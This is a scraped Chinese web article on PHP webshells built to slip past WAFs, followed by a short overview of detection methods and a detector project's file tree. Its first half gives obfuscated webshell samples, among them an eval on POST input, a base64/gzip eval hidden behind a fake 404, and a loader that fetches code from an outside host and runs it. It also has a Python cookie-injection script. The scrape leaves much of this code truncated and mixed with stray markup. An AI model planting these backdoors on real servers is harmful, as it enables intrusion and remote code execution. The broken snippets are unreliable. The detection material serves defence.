网络编程 
首页 > 网络编程 > 浏览文章

PHP常见过waf webshell以及最简单的检测方法

(编辑:jimmy 日期: 2026/4/28 浏览:3 次 )

前言

之前在Webshell查杀的新思路中留了一个坑 "color: #ff0000">常见绕过WAF的PHP webshell

字符串变形

大小写、编码、截取、替换、特殊字符拼接、null、回车、换行、特殊字符串干扰

<"YXNzYXNz+00000____");
$a = substr_replace($a,"ert",3);
$a($_POST['x']);
"htmlcode">



<"htmlcode">



<"htmlcode">



<"$this->a");
 }
}
$b = new test;
$b->a = $_POST['x'];
"htmlcode">



<"Content-type:text/html;charset=utf-8");if(empty($_SESSION['api']))
$_SESSION['api']=substr(file_get_contents(sprintf('%s"H*",
'687474703a2f2f7777772e77326e31636b2e636f6d2f7368656c6c2f312e6a7067'),uniqid())),3649);
@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null);
"htmlcode">



<"htmlcode">



<"" and $dao!=""){
 $cai=gzuncompress(base64_decode($cai));$cai(gzuncompress(base64_decode($dao)));
}
header('HTTP/1.1 404 Not Found');
"htmlcode">



import requests
url = 'http://localhost/"phpinfo();".encode('hex')
cookies = {
 'PHPSESSID':payload
}
r = requests.get(url=url,cookies=cookies)
print r.content





PHP混淆加解密




以phpjiami为例


就是将函数名、变量名全部变成”乱码”,且改动任意一个地方,都将导致文件不能运行。具体可访问: https://www.phpjiami.com/


PHP webshell检测方法




目前我所了解的webshell检测方式有:


    
  
  1. 机器学习检测webshell:比如混淆度、最长单词、重合指数、特征、压缩比等
    2. 
  
  2. 动态检测(沙箱)
    3. 
  
  3. 基于流量模式检测webshell:agent
    4. 
  
  4. 逆向算法+静态匹配检测webshell:比如D盾webshell查杀
    5. 
  
  5. 根据文件入度出度来检测
    6. 



实例展示




这里以PHPjiami的webshell为例,其中 2.php 即为phpjiama的木马


PHP常见过waf webshell以及最简单的检测方法


可以明显看到明显的webshell规则了,这样再用静态规则、正则等即可轻松检测到。


简单检测思路




检测思路:


文件上传->文件包含->获取所有文件中的变量到临时文件中->静态规则匹配临时文件->返回匹配结果




├── __init__.py

├── conf

│   ├── __init__.py

│   ├── config.py

├── core

│   ├── __init__.py

│   ├── all_check.py

│   ├── data_mysql.py

│   └── file_inotify.py

├── lib

│   ├── __init__.py

│   └── semantic_analysis_api.py

├── test

│   ├── __init__.py

│   ├── file_md5_move.py

│   ├── os_check.py

│   ├── random_file_test.py

│   └── ...

├── web

│   ├── static

│   │   ├── css

│   │   │   ├── main.css

│   │   ├── images

│   │   │   └── background.jpg

│   │   └── js

│   │       └── upload.js

│   ├── templates

│   │   ├── index.html

│   ├── upload_file.php

│   └── include_file_to_tmp.php

├── webshell_check.py






conf中包含的是诸如下列的静态检测规则


PHP常见过waf webshell以及最简单的检测方法


总结


以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,谢谢大家对的支持。


            

            上一篇:PHP经典设计模式之依赖注入定义与用法详解

            下一篇:PHP __call()方法实现委托示例

        

    

    
一句话新闻
一文看懂荣耀MagicBook Pro 16
荣耀猎人回归!七大亮点看懂不只是轻薄本,更是游戏本的MagicBook Pro 16.
人们对于笔记本电脑有一个固有印象:要么轻薄但性能一般,要么性能强劲但笨重臃肿。然而,今年荣耀新推出的MagicBook Pro 16刷新了人们的认知——发布会上,荣耀宣布猎人游戏本正式回归,称其继承了荣耀 HUNTER 基因,并自信地为其打出“轻薄本,更是游戏本”的口号。
众所周知,寻求轻薄本的用户普遍更看重便携性、外观造型、静谧性和打字办公等用机体验,而寻求游戏本的用户则普遍更看重硬件配置、性能释放等硬核指标。把两个看似难以相干的产品融合到一起,我们不禁对它产生了强烈的好奇:作为代表荣耀猎人游戏本的跨界新物种,它究竟做了哪些平衡以兼顾不同人群的各类需求呢?

    
    

        友情链接:杰晶网络 DDR爱好者之家 南强小屋 黑松山资源网 白云城资源网 网站地图 SiteMap